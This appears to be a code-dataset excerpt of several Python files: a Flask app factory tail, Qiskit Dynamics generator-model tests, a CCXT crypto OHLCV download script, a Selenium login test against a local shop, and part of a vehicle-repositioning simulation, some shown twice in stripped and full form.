from modules.manufacturer.manufac import manufac_blueprint
from modules.products.products import prod_blueprint
from modules.settings.settings_modif import settings_blueprint
from modules.appointment.appointment import appointment_blueprint
from modules.people.people import people_blueprint
from modules.admin.admin_modif import admin_blueprint
from modules.login.login import login_blueprint
from modules.save.save import save_blueprint
from modules.base.base import base_blueprint
app.register_blueprint(manufac_blueprint)
app.register_blueprint(prod_blueprint)
app.register_blueprint(settings_blueprint)
app.register_blueprint(appointment_blueprint)
app.register_blueprint(people_blueprint)
app.register_blueprint(admin_blueprint)
app.register_blueprint(login_blueprint)
app.register_blueprint(save_blueprint)
app.register_blueprint(base_blueprint)
@app.route('/')
def index():
return redirect(app_config[config_name].HOMEPAGE_URL)
return app
app = create_app('development')
if __name__ == '__main__':
app.run(debug=True, host='0.0.0.0')
| 1,238 | 0 | 23 |
0489731e34107e54ace58ece45592ae663e898e0 | 13,780 | py | Python | test/dynamics/models/test_generator_models.py | mtreinish/qiskit-dynamics | 1c2abca01e4f1bf4c66431103340ecd6c5f67817 | [
"Apache-2.0"
] | null | null | null | test/dynamics/models/test_generator_models.py | mtreinish/qiskit-dynamics | 1c2abca01e4f1bf4c66431103340ecd6c5f67817 | [
"Apache-2.0"
] | null | null | null | test/dynamics/models/test_generator_models.py | mtreinish/qiskit-dynamics | 1c2abca01e4f1bf4c66431103340ecd6c5f67817 | [
"Apache-2.0"
] | null | null | null | # This code is part of Qiskit.
#
# (C) Copyright IBM 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
# pylint: disable=invalid-name
"""Tests for operator_models.py"""
import numpy as np
from scipy.linalg import expm
from qiskit import QiskitError
from qiskit.quantum_info.operators import Operator
from qiskit_dynamics.models import GeneratorModel
from qiskit_dynamics.models.generator_models import CallableGenerator
from qiskit_dynamics.signals import Signal
from qiskit_dynamics.dispatch import Array
from ..common import QiskitDynamicsTestCase, TestJaxBase
class TestGeneratorModel(QiskitDynamicsTestCase):
"""Tests for GeneratorModel."""
def test_frame_operator_errors(self):
"""Check different modes of error raising for frame setting."""
# 1d array
try:
self.basic_model.frame = Array([1.0, 1.0])
except QiskitError as e:
self.assertTrue("anti-Hermitian" in str(e))
# 2d array
try:
self.basic_model.frame = Array([[1.0, 0.0], [0.0, 1.0]])
except QiskitError as e:
self.assertTrue("anti-Hermitian" in str(e))
# Operator
try:
self.basic_model.frame = self.Z
except QiskitError as e:
self.assertTrue("anti-Hermitian" in str(e))
def test_diag_frame_operator_basic_model(self):
"""Test setting a diagonal frame operator for the internally
set up basic model.
"""
self._basic_frame_evaluate_test(Array([1j, -1j]), 1.123)
self._basic_frame_evaluate_test(Array([1j, -1j]), np.pi)
def test_non_diag_frame_operator_basic_model(self):
"""Test setting a non-diagonal frame operator for the internally
set up basic model.
"""
self._basic_frame_evaluate_test(-1j * (self.Y + self.Z), 1.123)
self._basic_frame_evaluate_test(-1j * (self.Y - self.Z), np.pi)
def _basic_frame_evaluate_test(self, frame_operator, t):
"""Routine for testing setting of valid frame operators using the
basic_model.
"""
self.basic_model.frame = frame_operator
# convert to 2d array
if isinstance(frame_operator, Operator):
frame_operator = Array(frame_operator.data)
if isinstance(frame_operator, Array) and frame_operator.ndim == 1:
frame_operator = np.diag(frame_operator)
value = self.basic_model.evaluate(t)
i2pi = -1j * 2 * np.pi
U = expm(-np.array(frame_operator) * t)
# drive coefficient
d_coeff = self.r * np.cos(2 * np.pi * self.w * t)
# manually evaluate frame
expected = (
i2pi * self.w * U @ self.Z.data @ U.conj().transpose() / 2
+ d_coeff * i2pi * U @ self.X.data @ U.conj().transpose() / 2
- frame_operator
)
self.assertAllClose(value, expected)
def test_evaluate_no_frame_basic_model(self):
"""Test evaluation without a frame in the basic model."""
t = 3.21412
value = self.basic_model.evaluate(t)
i2pi = -1j * 2 * np.pi
d_coeff = self.r * np.cos(2 * np.pi * self.w * t)
expected = i2pi * self.w * self.Z.data / 2 + i2pi * d_coeff * self.X.data / 2
self.assertAllClose(value, expected)
def test_evaluate_in_frame_basis_basic_model(self):
"""Test evaluation in frame basis in the basic_model."""
frame_op = -1j * (self.X + 0.2 * self.Y + 0.1 * self.Z).data
# enter the frame given by the -1j * X
self.basic_model.frame = frame_op
# get the frame basis that is used in model
_, U = np.linalg.eigh(1j * frame_op)
t = 3.21412
value = self.basic_model.evaluate(t, in_frame_basis=True)
# compose the frame basis transformation with the exponential
# frame rotation (this will be multiplied on the right)
U = expm(np.array(frame_op) * t) @ U
Uadj = U.conj().transpose()
i2pi = -1j * 2 * np.pi
d_coeff = self.r * np.cos(2 * np.pi * self.w * t)
expected = (
Uadj
@ (i2pi * self.w * self.Z.data / 2 + i2pi * d_coeff * self.X.data / 2 - frame_op)
@ U
)
self.assertAllClose(value, expected)
def test_evaluate_pseudorandom(self):
"""Test evaluate with pseudorandom inputs."""
rng = np.random.default_rng(30493)
num_terms = 3
dim = 5
b = 1.0 # bound on size of random terms
rand_op = rng.uniform(low=-b, high=b, size=(dim, dim)) + 1j * rng.uniform(
low=-b, high=b, size=(dim, dim)
)
frame_op = Array(rand_op - rand_op.conj().transpose())
randoperators = rng.uniform(low=-b, high=b, size=(num_terms, dim, dim)) + 1j * rng.uniform(
low=-b, high=b, size=(num_terms, dim, dim)
)
rand_coeffs = Array(
rng.uniform(low=-b, high=b, size=(num_terms))
+ 1j * rng.uniform(low=-b, high=b, size=(num_terms))
)
rand_carriers = Array(rng.uniform(low=-b, high=b, size=(num_terms)))
rand_phases = Array(rng.uniform(low=-b, high=b, size=(num_terms)))
self._test_evaluate(frame_op, randoperators, rand_coeffs, rand_carriers, rand_phases)
rng = np.random.default_rng(94818)
num_terms = 5
dim = 10
b = 1.0 # bound on size of random terms
rand_op = rng.uniform(low=-b, high=b, size=(dim, dim)) + 1j * rng.uniform(
low=-b, high=b, size=(dim, dim)
)
frame_op = Array(rand_op - rand_op.conj().transpose())
randoperators = Array(
rng.uniform(low=-b, high=b, size=(num_terms, dim, dim))
+ 1j * rng.uniform(low=-b, high=b, size=(num_terms, dim, dim))
)
rand_coeffs = Array(
rng.uniform(low=-b, high=b, size=(num_terms))
+ 1j * rng.uniform(low=-b, high=b, size=(num_terms))
)
rand_carriers = Array(rng.uniform(low=-b, high=b, size=(num_terms)))
rand_phases = Array(rng.uniform(low=-b, high=b, size=(num_terms)))
self._test_evaluate(frame_op, randoperators, rand_coeffs, rand_carriers, rand_phases)
def test_lmult_rmult_no_frame_basic_model(self):
"""Test evaluation with no frame in the basic model."""
y0 = np.array([[1.0, 2.0], [0.0, 4.0]])
t = 3.21412
i2pi = -1j * 2 * np.pi
d_coeff = self.r * np.cos(2 * np.pi * self.w * t)
model_expected = i2pi * self.w * self.Z.data / 2 + i2pi * d_coeff * self.X.data / 2
self.assertAllClose(self.basic_model.lmult(t, y0), model_expected @ y0)
self.assertAllClose(self.basic_model.rmult(t, y0), y0 @ model_expected)
def test_signal_setting(self):
"""Test updating the signals."""
signals = [Signal(lambda t: 2 * t, 1.0), Signal(lambda t: t ** 2, 2.0)]
self.basic_model.signals = signals
t = 0.1
value = self.basic_model.evaluate(t)
i2pi = -1j * 2 * np.pi
Z_coeff = (2 * t) * np.cos(2 * np.pi * 1 * t)
X_coeff = self.r * (t ** 2) * np.cos(2 * np.pi * 2 * t)
expected = i2pi * Z_coeff * self.Z.data / 2 + i2pi * X_coeff * self.X.data / 2
self.assertAllClose(value, expected)
def test_signal_setting_None(self):
"""Test setting signals to None"""
self.basic_model.signals = None
self.assertTrue(self.basic_model.signals is None)
def test_signal_setting_incorrect_length(self):
"""Test error being raised if signals is the wrong length."""
try:
self.basic_model.signals = [1.0]
except QiskitError as e:
self.assertTrue("same length" in str(e))
def test_drift(self):
"""Test drift evaluation."""
self.assertAllClose(self.basic_model.drift, -1j * 2 * np.pi * self.w * self.Z.data / 2)
def test_drift_error_in_frame(self):
"""Test raising of error if drift is requested in a frame."""
self.basic_model.frame = self.basic_model.drift
try:
self.basic_model.drift
except QiskitError as e:
self.assertTrue("ill-defined" in str(e))
def test_cutoff_freq(self):
"""Test evaluation with a cutoff frequency."""
# enter frame of drift
self.basic_model.frame = self.basic_model.drift
# set cutoff freq to 2 * drive freq (standard RWA)
self.basic_model.cutoff_freq = 2 * self.w
# result should just be the X term halved
eval_rwa = self.basic_model.evaluate(2.0)
expected = -1j * 2 * np.pi * (self.r / 2) * self.X.data / 2
self.assertAllClose(eval_rwa, expected)
self.basic_model.signals = [self.w, Signal(drive_func, self.w)]
# result should now contain both X and Y terms halved
t = 2.1231 * np.pi
dRe = np.real(drive_func(t))
dIm = np.imag(drive_func(t))
eval_rwa = self.basic_model.evaluate(t)
expected = (
-1j * 2 * np.pi * (self.r / 2) * dRe * self.X.data / 2
+ -1j * 2 * np.pi * (self.r / 2) * dIm * self.Y.data / 2
)
self.assertAllClose(eval_rwa, expected)
def assertAllClose(self, A, B, rtol=1e-8, atol=1e-8):
"""Call np.allclose and assert true."""
self.assertTrue(np.allclose(A, B, rtol=rtol, atol=atol))
class TestGeneratorModelJax(TestGeneratorModel, TestJaxBase):
"""Jax version of TestGeneratorModel tests.
Note: This class has no body but contains tests due to inheritance.
"""
class TestCallableGenerator(QiskitDynamicsTestCase):
"""Tests for CallableGenerator."""
def test_diag_frame_operator_basic_model(self):
"""Test setting a diagonal frame operator for the internally
set up basic model.
"""
self._basic_frame_evaluate_test(Array([1j, -1j]), 1.123)
self._basic_frame_evaluate_test(Array([1j, -1j]), np.pi)
def test_non_diag_frame_operator_basic_model(self):
"""Test setting a non-diagonal frame operator for the internally
set up basic model.
"""
self._basic_frame_evaluate_test(-1j * (self.Y + self.Z), 1.123)
self._basic_frame_evaluate_test(-1j * (self.Y - self.Z), np.pi)
def _basic_frame_evaluate_test(self, frame_operator, t):
"""Routine for testing setting of valid frame operators using the
basic_model.
"""
self.basic_model.frame = frame_operator
# convert to 2d array
if isinstance(frame_operator, Operator):
frame_operator = Array(frame_operator.data)
if isinstance(frame_operator, Array) and frame_operator.ndim == 1:
frame_operator = np.diag(frame_operator)
value = self.basic_model.evaluate(t)
i2pi = -1j * 2 * np.pi
U = expm(-np.array(frame_operator) * t)
# drive coefficient
d_coeff = self.r * np.cos(2 * np.pi * self.w * t)
# manually evaluate frame
expected = (
i2pi * self.w * U @ self.Z.data @ U.conj().transpose() / 2
+ d_coeff * i2pi * U @ self.X.data @ U.conj().transpose() / 2
- frame_operator
)
self.assertAllClose(value, expected)
class TestCallableGeneratorJax(TestCallableGenerator, TestJaxBase):
"""Jax version of TestCallableGenerator tests.
Note: This class has no body but contains tests due to inheritance.
"""
| 35.153061 | 99 | 0.603338 | # This code is part of Qiskit.
#
# (C) Copyright IBM 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
# pylint: disable=invalid-name
"""Tests for operator_models.py"""
import numpy as np
from scipy.linalg import expm
from qiskit import QiskitError
from qiskit.quantum_info.operators import Operator
from qiskit_dynamics.models import GeneratorModel
from qiskit_dynamics.models.generator_models import CallableGenerator
from qiskit_dynamics.signals import Signal
from qiskit_dynamics.dispatch import Array
from ..common import QiskitDynamicsTestCase, TestJaxBase
class TestGeneratorModel(QiskitDynamicsTestCase):
"""Tests for GeneratorModel."""
def setUp(self):
self.X = Array(Operator.from_label("X").data)
self.Y = Array(Operator.from_label("Y").data)
self.Z = Array(Operator.from_label("Z").data)
# define a basic model
w = 2.0
r = 0.5
operators = [-1j * 2 * np.pi * self.Z / 2, -1j * 2 * np.pi * r * self.X / 2]
signals = [w, Signal(1.0, w)]
self.w = 2
self.r = r
self.basic_model = GeneratorModel(operators=operators, signals=signals)
def test_frame_operator_errors(self):
"""Check different modes of error raising for frame setting."""
# 1d array
try:
self.basic_model.frame = Array([1.0, 1.0])
except QiskitError as e:
self.assertTrue("anti-Hermitian" in str(e))
# 2d array
try:
self.basic_model.frame = Array([[1.0, 0.0], [0.0, 1.0]])
except QiskitError as e:
self.assertTrue("anti-Hermitian" in str(e))
# Operator
try:
self.basic_model.frame = self.Z
except QiskitError as e:
self.assertTrue("anti-Hermitian" in str(e))
def test_diag_frame_operator_basic_model(self):
"""Test setting a diagonal frame operator for the internally
set up basic model.
"""
self._basic_frame_evaluate_test(Array([1j, -1j]), 1.123)
self._basic_frame_evaluate_test(Array([1j, -1j]), np.pi)
def test_non_diag_frame_operator_basic_model(self):
"""Test setting a non-diagonal frame operator for the internally
set up basic model.
"""
self._basic_frame_evaluate_test(-1j * (self.Y + self.Z), 1.123)
self._basic_frame_evaluate_test(-1j * (self.Y - self.Z), np.pi)
def _basic_frame_evaluate_test(self, frame_operator, t):
"""Routine for testing setting of valid frame operators using the
basic_model.
"""
self.basic_model.frame = frame_operator
# convert to 2d array
if isinstance(frame_operator, Operator):
frame_operator = Array(frame_operator.data)
if isinstance(frame_operator, Array) and frame_operator.ndim == 1:
frame_operator = np.diag(frame_operator)
value = self.basic_model.evaluate(t)
i2pi = -1j * 2 * np.pi
U = expm(-np.array(frame_operator) * t)
# drive coefficient
d_coeff = self.r * np.cos(2 * np.pi * self.w * t)
# manually evaluate frame
expected = (
i2pi * self.w * U @ self.Z.data @ U.conj().transpose() / 2
+ d_coeff * i2pi * U @ self.X.data @ U.conj().transpose() / 2
- frame_operator
)
self.assertAllClose(value, expected)
def test_evaluate_no_frame_basic_model(self):
"""Test evaluation without a frame in the basic model."""
t = 3.21412
value = self.basic_model.evaluate(t)
i2pi = -1j * 2 * np.pi
d_coeff = self.r * np.cos(2 * np.pi * self.w * t)
expected = i2pi * self.w * self.Z.data / 2 + i2pi * d_coeff * self.X.data / 2
self.assertAllClose(value, expected)
def test_evaluate_in_frame_basis_basic_model(self):
"""Test evaluation in frame basis in the basic_model."""
frame_op = -1j * (self.X + 0.2 * self.Y + 0.1 * self.Z).data
# enter the frame given by the -1j * X
self.basic_model.frame = frame_op
# get the frame basis that is used in model
_, U = np.linalg.eigh(1j * frame_op)
t = 3.21412
value = self.basic_model.evaluate(t, in_frame_basis=True)
# compose the frame basis transformation with the exponential
# frame rotation (this will be multiplied on the right)
U = expm(np.array(frame_op) * t) @ U
Uadj = U.conj().transpose()
i2pi = -1j * 2 * np.pi
d_coeff = self.r * np.cos(2 * np.pi * self.w * t)
expected = (
Uadj
@ (i2pi * self.w * self.Z.data / 2 + i2pi * d_coeff * self.X.data / 2 - frame_op)
@ U
)
self.assertAllClose(value, expected)
def test_evaluate_pseudorandom(self):
"""Test evaluate with pseudorandom inputs."""
rng = np.random.default_rng(30493)
num_terms = 3
dim = 5
b = 1.0 # bound on size of random terms
rand_op = rng.uniform(low=-b, high=b, size=(dim, dim)) + 1j * rng.uniform(
low=-b, high=b, size=(dim, dim)
)
frame_op = Array(rand_op - rand_op.conj().transpose())
randoperators = rng.uniform(low=-b, high=b, size=(num_terms, dim, dim)) + 1j * rng.uniform(
low=-b, high=b, size=(num_terms, dim, dim)
)
rand_coeffs = Array(
rng.uniform(low=-b, high=b, size=(num_terms))
+ 1j * rng.uniform(low=-b, high=b, size=(num_terms))
)
rand_carriers = Array(rng.uniform(low=-b, high=b, size=(num_terms)))
rand_phases = Array(rng.uniform(low=-b, high=b, size=(num_terms)))
self._test_evaluate(frame_op, randoperators, rand_coeffs, rand_carriers, rand_phases)
rng = np.random.default_rng(94818)
num_terms = 5
dim = 10
b = 1.0 # bound on size of random terms
rand_op = rng.uniform(low=-b, high=b, size=(dim, dim)) + 1j * rng.uniform(
low=-b, high=b, size=(dim, dim)
)
frame_op = Array(rand_op - rand_op.conj().transpose())
randoperators = Array(
rng.uniform(low=-b, high=b, size=(num_terms, dim, dim))
+ 1j * rng.uniform(low=-b, high=b, size=(num_terms, dim, dim))
)
rand_coeffs = Array(
rng.uniform(low=-b, high=b, size=(num_terms))
+ 1j * rng.uniform(low=-b, high=b, size=(num_terms))
)
rand_carriers = Array(rng.uniform(low=-b, high=b, size=(num_terms)))
rand_phases = Array(rng.uniform(low=-b, high=b, size=(num_terms)))
self._test_evaluate(frame_op, randoperators, rand_coeffs, rand_carriers, rand_phases)
def _test_evaluate(self, frame_op, operators, coefficients, carriers, phases):
sig_list = []
for coeff, freq, phase in zip(coefficients, carriers, phases):
def get_env_func(coeff=coeff):
# pylint: disable=unused-argument
def env(t):
return coeff
return env
sig_list.append(Signal(get_env_func(), freq, phase))
model = GeneratorModel(operators, sig_list, frame=frame_op)
value = model.evaluate(1.0)
coeffs = np.real(coefficients * np.exp(1j * 2 * np.pi * carriers * 1.0 + 1j * phases))
expected = (
expm(-np.array(frame_op))
@ np.tensordot(coeffs, operators, axes=1)
@ expm(np.array(frame_op))
- frame_op
)
self.assertAllClose(value, expected)
def test_lmult_rmult_no_frame_basic_model(self):
"""Test evaluation with no frame in the basic model."""
y0 = np.array([[1.0, 2.0], [0.0, 4.0]])
t = 3.21412
i2pi = -1j * 2 * np.pi
d_coeff = self.r * np.cos(2 * np.pi * self.w * t)
model_expected = i2pi * self.w * self.Z.data / 2 + i2pi * d_coeff * self.X.data / 2
self.assertAllClose(self.basic_model.lmult(t, y0), model_expected @ y0)
self.assertAllClose(self.basic_model.rmult(t, y0), y0 @ model_expected)
def test_signal_setting(self):
"""Test updating the signals."""
signals = [Signal(lambda t: 2 * t, 1.0), Signal(lambda t: t ** 2, 2.0)]
self.basic_model.signals = signals
t = 0.1
value = self.basic_model.evaluate(t)
i2pi = -1j * 2 * np.pi
Z_coeff = (2 * t) * np.cos(2 * np.pi * 1 * t)
X_coeff = self.r * (t ** 2) * np.cos(2 * np.pi * 2 * t)
expected = i2pi * Z_coeff * self.Z.data / 2 + i2pi * X_coeff * self.X.data / 2
self.assertAllClose(value, expected)
def test_signal_setting_None(self):
"""Test setting signals to None"""
self.basic_model.signals = None
self.assertTrue(self.basic_model.signals is None)
def test_signal_setting_incorrect_length(self):
"""Test error being raised if signals is the wrong length."""
try:
self.basic_model.signals = [1.0]
except QiskitError as e:
self.assertTrue("same length" in str(e))
def test_drift(self):
"""Test drift evaluation."""
self.assertAllClose(self.basic_model.drift, -1j * 2 * np.pi * self.w * self.Z.data / 2)
def test_drift_error_in_frame(self):
"""Test raising of error if drift is requested in a frame."""
self.basic_model.frame = self.basic_model.drift
try:
self.basic_model.drift
except QiskitError as e:
self.assertTrue("ill-defined" in str(e))
def test_cutoff_freq(self):
"""Test evaluation with a cutoff frequency."""
# enter frame of drift
self.basic_model.frame = self.basic_model.drift
# set cutoff freq to 2 * drive freq (standard RWA)
self.basic_model.cutoff_freq = 2 * self.w
# result should just be the X term halved
eval_rwa = self.basic_model.evaluate(2.0)
expected = -1j * 2 * np.pi * (self.r / 2) * self.X.data / 2
self.assertAllClose(eval_rwa, expected)
def drive_func(t):
return t ** 2 + t ** 3 * 1j
self.basic_model.signals = [self.w, Signal(drive_func, self.w)]
# result should now contain both X and Y terms halved
t = 2.1231 * np.pi
dRe = np.real(drive_func(t))
dIm = np.imag(drive_func(t))
eval_rwa = self.basic_model.evaluate(t)
expected = (
-1j * 2 * np.pi * (self.r / 2) * dRe * self.X.data / 2
+ -1j * 2 * np.pi * (self.r / 2) * dIm * self.Y.data / 2
)
self.assertAllClose(eval_rwa, expected)
def assertAllClose(self, A, B, rtol=1e-8, atol=1e-8):
"""Call np.allclose and assert true."""
self.assertTrue(np.allclose(A, B, rtol=rtol, atol=atol))
class TestGeneratorModelJax(TestGeneratorModel, TestJaxBase):
"""Jax version of TestGeneratorModel tests.
Note: This class has no body but contains tests due to inheritance.
"""
class TestCallableGenerator(QiskitDynamicsTestCase):
"""Tests for CallableGenerator."""
def setUp(self):
self.X = Array(Operator.from_label("X").data)
self.Y = Array(Operator.from_label("Y").data)
self.Z = Array(Operator.from_label("Z").data)
# define a basic model
w = Array(2.0)
r = Array(0.5)
operators = [-1j * 2 * np.pi * self.Z / 2, -1j * 2 * np.pi * r * self.X / 2]
def generator(t):
return w * operators[0] + np.cos(2 * np.pi * w * t) * operators[1]
self.w = 2
self.r = r
self.basic_model = CallableGenerator(generator)
def test_diag_frame_operator_basic_model(self):
"""Test setting a diagonal frame operator for the internally
set up basic model.
"""
self._basic_frame_evaluate_test(Array([1j, -1j]), 1.123)
self._basic_frame_evaluate_test(Array([1j, -1j]), np.pi)
def test_non_diag_frame_operator_basic_model(self):
"""Test setting a non-diagonal frame operator for the internally
set up basic model.
"""
self._basic_frame_evaluate_test(-1j * (self.Y + self.Z), 1.123)
self._basic_frame_evaluate_test(-1j * (self.Y - self.Z), np.pi)
def _basic_frame_evaluate_test(self, frame_operator, t):
"""Routine for testing setting of valid frame operators using the
basic_model.
"""
self.basic_model.frame = frame_operator
# convert to 2d array
if isinstance(frame_operator, Operator):
frame_operator = Array(frame_operator.data)
if isinstance(frame_operator, Array) and frame_operator.ndim == 1:
frame_operator = np.diag(frame_operator)
value = self.basic_model.evaluate(t)
i2pi = -1j * 2 * np.pi
U = expm(-np.array(frame_operator) * t)
# drive coefficient
d_coeff = self.r * np.cos(2 * np.pi * self.w * t)
# manually evaluate frame
expected = (
i2pi * self.w * U @ self.Z.data @ U.conj().transpose() / 2
+ d_coeff * i2pi * U @ self.X.data @ U.conj().transpose() / 2
- frame_operator
)
self.assertAllClose(value, expected)
class TestCallableGeneratorJax(TestCallableGenerator, TestJaxBase):
"""Jax version of TestCallableGenerator tests.
Note: This class has no body but contains tests due to inheritance.
"""
| 1,852 | 0 | 112 |
7dbb46434026418f35f91a9285c0767203877e0b | 4,354 | py | Python | im_v2/ccxt/data/extract/download_historical_data.py | alphamatic/amp | 5018137097159415c10eaa659a2e0de8c4e403d4 | [
"BSD-3-Clause"
] | 5 | 2021-08-10T23:16:44.000Z | 2022-03-17T17:27:00.000Z | im_v2/ccxt/data/extract/download_historical_data.py | alphamatic/amp | 5018137097159415c10eaa659a2e0de8c4e403d4 | [
"BSD-3-Clause"
] | 330 | 2021-06-10T17:28:22.000Z | 2022-03-31T00:55:48.000Z | im_v2/ccxt/data/extract/download_historical_data.py | alphamatic/amp | 5018137097159415c10eaa659a2e0de8c4e403d4 | [
"BSD-3-Clause"
] | 6 | 2021-06-10T17:20:32.000Z | 2022-03-28T08:08:03.000Z | #!/usr/bin/env python
"""
Script to download historical data from CCXT.
Use as:
# Download data for CCXT for trading universe `v03` from 2019-01-01 to now:
> download_historical_data.py \
--dst_dir 'test' \
--universe 'v03' \
--start_datetime '2019-01-01'
Import as:
import im_v2.ccxt.data.extract.download_historical_data as imvcdedhda
"""
import argparse
import logging
import os
import time
import pandas as pd
import helpers.hdbg as hdbg
import helpers.hio as hio
import helpers.hparser as hparser
import im_v2.ccxt.data.extract.exchange_class as imvcdeexcl
import im_v2.ccxt.universe.universe as imvccunun
_LOG = logging.getLogger(__name__)
if __name__ == "__main__":
_main(_parse())
| 30.447552 | 80 | 0.628158 | #!/usr/bin/env python
"""
Script to download historical data from CCXT.
Use as:
# Download data for CCXT for trading universe `v03` from 2019-01-01 to now:
> download_historical_data.py \
--dst_dir 'test' \
--universe 'v03' \
--start_datetime '2019-01-01'
Import as:
import im_v2.ccxt.data.extract.download_historical_data as imvcdedhda
"""
import argparse
import logging
import os
import time
import pandas as pd
import helpers.hdbg as hdbg
import helpers.hio as hio
import helpers.hparser as hparser
import im_v2.ccxt.data.extract.exchange_class as imvcdeexcl
import im_v2.ccxt.universe.universe as imvccunun
_LOG = logging.getLogger(__name__)
def _parse() -> argparse.ArgumentParser:
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawTextHelpFormatter,
)
parser.add_argument(
"--dst_dir",
action="store",
required=True,
type=str,
help="Folder to download files to",
)
parser.add_argument(
"--api_keys",
action="store",
type=str,
default=imvcdeexcl.API_KEYS_PATH,
help="Path to JSON file that contains API keys for exchange access",
)
parser.add_argument(
"--universe",
action="store",
required=True,
type=str,
help="Trade universe to download data for, e.g. 'latest', '01'",
)
parser.add_argument(
"--start_datetime",
action="store",
required=True,
type=str,
help="Start date of download to parse with pd.Timestamp",
)
parser.add_argument(
"--end_datetime",
action="store",
type=str,
default=None,
help="End date of download to parse with pd.Timestamp. "
"None means datetime.now())",
)
parser.add_argument(
"--step",
action="store",
type=int,
default=None,
help="Size of each API request per iteration",
)
parser.add_argument(
"--sleep_time",
action="store",
type=int,
default=60,
help="Sleep time between currency pair downloads (in seconds).",
)
parser.add_argument("--incremental", action="store_true")
parser = hparser.add_verbosity_arg(parser)
return parser # type: ignore[no-any-return]
def _main(parser: argparse.ArgumentParser) -> None:
args = parser.parse_args()
hdbg.init_logger(verbosity=args.log_level, use_exec_path=True)
# Create the directory.
hio.create_dir(args.dst_dir, incremental=args.incremental)
# Handle start and end datetime.
start_datetime = pd.Timestamp(args.start_datetime)
if not args.end_datetime:
# If end datetime is not provided, use the current time.
end_datetime = pd.Timestamp.now()
else:
end_datetime = pd.Timestamp(args.end_datetime)
# Load trading universe.
if args.universe == "latest":
trade_universe = imvccunun.get_trade_universe()["CCXT"]
else:
trade_universe = imvccunun.get_trade_universe(args.universe)["CCXT"]
_LOG.info("Getting data for exchanges %s", ", ".join(trade_universe.keys()))
for exchange_id in trade_universe:
# Initialize the exchange class.
exchange = imvcdeexcl.CcxtExchange(
exchange_id, api_keys_path=args.api_keys
)
for currency_pair in trade_universe[exchange_id]:
_LOG.info("Downloading currency pair '%s'", currency_pair)
# Download OHLCV data.
currency_pair_data = exchange.download_ohlcv_data(
currency_pair,
start_datetime=start_datetime,
end_datetime=end_datetime,
bar_per_iteration=args.step,
)
# Sleep between iterations.
time.sleep(args.sleep_time)
# Create file name based on exchange and currency pair.
# E.g. 'binance_BTC_USDT.csv.gz'
file_name = f"{exchange_id}-{currency_pair}.csv.gz"
full_path = os.path.join(args.dst_dir, file_name)
# Save file.
currency_pair_data.to_csv(
full_path,
index=False,
compression="gzip",
)
_LOG.debug("Saved data to %s", file_name)
if __name__ == "__main__":
_main(_parse())
| 3,588 | 0 | 46 |
7dc34db5f2dc00dd11e93a3fc1b4656f6a345054 | 509 | py | Python | hw4_ch.py | AeliaKavington/sel-1 | 1d1af349a567a50c14a7e3ece2fa44e119ddb777 | [
"MIT"
] | null | null | null | hw4_ch.py | AeliaKavington/sel-1 | 1d1af349a567a50c14a7e3ece2fa44e119ddb777 | [
"MIT"
] | null | null | null | hw4_ch.py | AeliaKavington/sel-1 | 1d1af349a567a50c14a7e3ece2fa44e119ddb777 | [
"MIT"
] | null | null | null | import pytest
from time import sleep
from selenium import webdriver
@pytest.fixture
| 28.277778 | 68 | 0.740668 | import pytest
from time import sleep
from selenium import webdriver
@pytest.fixture
def driver(request):
wd = webdriver.Chrome(executable_path='./chromedriver')
print(wd.capabilities)
request.addfinalizer(wd.quit)
return wd
def test_example(driver):
driver.get("http://localhost/litecart/en/")
driver.find_element_by_name("email").send_keys("user@email.com")
driver.find_element_by_name("password").send_keys("test")
driver.find_element_by_name("login").click()
sleep(5) | 379 | 0 | 45 |
590d8de8bf744cdfaa4d9f3f82d36a9864edf3bf | 25,183 | py | Python | python/handler.py | kgladstone/thesis | 6e35fbd7c2cd08e868ce5c36cd64e8025c9e5f53 | [
"BSD-3-Clause"
] | null | null | null | python/handler.py | kgladstone/thesis | 6e35fbd7c2cd08e868ce5c36cd64e8025c9e5f53 | [
"BSD-3-Clause"
] | null | null | null | python/handler.py | kgladstone/thesis | 6e35fbd7c2cd08e868ce5c36cd64e8025c9e5f53 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
"""
Filename: handler.py
Author: Keith Gladstone
Description:
This file is the heart of the program
It handles all vehicle allocation and repositioning
Contains trip_buffer, trip_location_hash_table, etc.
"""
import csv
import sys
from collections import deque
from math import floor
from vehicle import Vehicle
import trip_ops
import generic_ops
import pixel_ops
import demand_learning
def local_demand_predictor(current_p, day, time_block, beliefs, local_demand_degree):
'''Determines optimal cardinal direction to move vehicle.'''
current_x, current_y = current_p
directional_demand = [0, 0, 0, 0] # right, up, left, down
target_pixel = [(current_x + 1, current_y),
(current_x, current_y + 1),
(current_x - 1, current_y),
(current_x, current_y - 1)]
superpixel = pixel_ops.get_superpixel_degree_n(current_p, local_demand_degree)
for city_pixel, pixel_demand in beliefs.iteritems():
if city_pixel in superpixel:
(pixel_x, pixel_y) = city_pixel
demand_value = pixel_demand[generic_ops.get_day_code(day)][time_block][0]
if pixel_x > current_x:
directional_demand[0] += demand_value
if pixel_y > current_y:
directional_demand[1] += demand_value
if pixel_x < current_x:
directional_demand[2] += demand_value
if pixel_y < current_y:
directional_demand[3] += demand_value
return target_pixel[max((v, i) for i, v in enumerate(directional_demand))[1]]
def handle_empty_repositioning(vehicles_log, time, beliefs, local_demand_degree):
'''Moves vehicle using LEVRS.'''
time_block = generic_ops.get_time_block_from_time(time)
day_of_week = generic_ops.get_day_of_week_from_time(time)
empty_vehicles = list()
for vehicle_id in vehicles_log:
vehicle = vehicles_log[vehicle_id]
last_pinged_time = vehicle.time_of_last_ping
if last_pinged_time < time:
empty_vehicles.append(vehicle)
if len(empty_vehicles) == 0:
return vehicles_log
for empty_vehicle in empty_vehicles:
current_loc = empty_vehicle.most_recently_pinged_location
incremental_reposition = local_demand_predictor(\
current_loc, day_of_week, time_block, beliefs, local_demand_degree)
vehicles_log[empty_vehicle.vehicle_id] = \
empty_vehicle.empty_reposition(time, incremental_reposition)
return vehicles_log
def initial_vehicle_log(trip_log, fleet_size):
